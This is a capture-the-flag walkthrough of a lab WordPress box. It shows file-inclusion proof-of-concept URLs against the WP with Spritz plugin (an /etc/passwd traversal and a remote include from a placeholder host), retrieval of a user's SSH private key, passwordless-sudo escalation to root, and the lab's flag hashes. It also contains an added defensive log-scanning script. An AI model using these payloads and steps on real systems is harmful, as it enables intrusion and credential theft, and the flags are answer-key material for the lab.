172.31.1.8
Cybersec Labs CMS Writeup
Another WordPress site

Running WPScan, we find the /uploads directory, which has a screenshot showing the location of an id_rsa file: /home/angel/.ssh/id_rsa
WPScan also shows the Twenty Twenty theme as vulnerable, but I can't find anything.

But there’s a plugin with an RFI vulnerability:
WordPress Plugin WP with Spritz 1.0 – Remote File Inclusion

Proof of Concept
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec
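
On the defensive side, both request shapes in the proof of concept are easy to spot in a web server access log. The scanner below is an added example, not part of the original writeup or the plugin's code; it assumes combined-format log lines, and the sample lines, client IPs and hostname are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Plugin script path taken from the proof of concept above.
PLUGIN_SCRIPT = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"
# Client, request target and status of a combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines; IPs and hostname are documentation placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://files.example.test/exec HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 90',
    '203.0.113.20 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?url=../x HTTP/1.1" 200 4000',
]

def classify_url_param(value):
    """Label a suspicious `url` value, or return None if nothing stands out."""
    for _ in range(3):  # bounded re-decoding catches double-encoded input
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    lowered = value.lower()
    if re.match(r"[a-z][a-z0-9+.-]*://", lowered):
        return "remote-url"
    if "../" in lowered or "..\\" in lowered:
        return "path-traversal"
    if lowered.startswith("/"):
        return "absolute-path"
    return None

def scan(lines):
    """Return (client_ip, label, status) for each flagged request to the plugin script."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # Collapse duplicate slashes and case so trivial path variations still match.
        path = re.sub(r"/+", "/", unquote(parts.path)).lower()
        if path != PLUGIN_SCRIPT:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("url", []):
            label = classify_url_param(value)
            if label:
                findings.append((m.group("ip"), label, m.group("status")))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A flagged request that returned status 200 is the one to triage first, since on this box the same parameter exposed angel's private key.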

so going to


The output is not properly formatted, so we view the page source
and get the private key for user angel.
Log in via SSH:
ssh -i id_rsa angel@172.31.1.8
Running sudo -l
User angel may run the following commands on cms:
(ALL : ALL) NOPASSWD: ALL
So sudo su and we are root
root@cms:/home/angel# cat access.txt
d5ca58536a32935299d9f1026436f149
root@cms:~# cat system.txt
459daa8ee877e8048563ca65dc867afa
Author
Sentinal920